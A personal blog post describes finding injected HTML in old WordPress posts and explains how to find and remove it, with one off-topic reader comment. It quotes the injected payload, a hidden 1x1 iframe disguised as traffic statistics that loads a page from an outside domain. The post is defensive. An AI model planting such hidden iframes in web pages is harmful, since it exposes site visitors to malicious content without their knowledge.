annoying html injection in wordpress

two of my old posts at my geekblog Haibane.info dating from November 2007 had some injected HTML code in them. The injected code read as follows:

<!-- Traffic Statistics --> <iframe src=http://www.wp-stats-php.info/iframe/wp-stats.php width=1 height=1 frameborder=0></iframe> <!-- End Traffic Statistics -->

I only became aware of it when Google flagged my archives for that month as “malicious”. Viewing source of the archives page revealed the hack – probably from some window of time in which I hadnt upgraded to the latest wordpress version.

To ensure you don’t have old posts in your archives with this exploit, just search your posts for the term “iframe”. Edit those posts and you’ll likely as not find similar code to above.

WordPress has come a long way in making upgrades easier with one click (though some people still run into problems on occasion). I think it would be better is WP had a incremental and automated upgrade process whereby whenever a security-related update was available, you could have it automatically install, just like you can set in Windows. Ideally, this would be controlled by a setting in the Dashboard to “turn on/off automatic security patches” and when enabled, would “register” your blog with the mothership at wordpress.org so that whenever a security patch is available, you get an automatic email to your admin email account notifying you, and when you next login to Dashboard the patch is automatically applied.

1 thought on “annoying html injection in wordpress”

  1. This is in response to you twitter question about the bigger question re the Swiss referendum, nothing to do with this blogpost if you don’t mind (you have disabled direct messages): Your question is what gets people tied up into knots, and so is intersting I think. But the answer is simple: universal human rights trumps any decisionmaking technique, be it direct or indirect democracy, or decree. But (certain) countries may override universal human rights with impunity unfortunately, at least for the time being.

Comments are closed.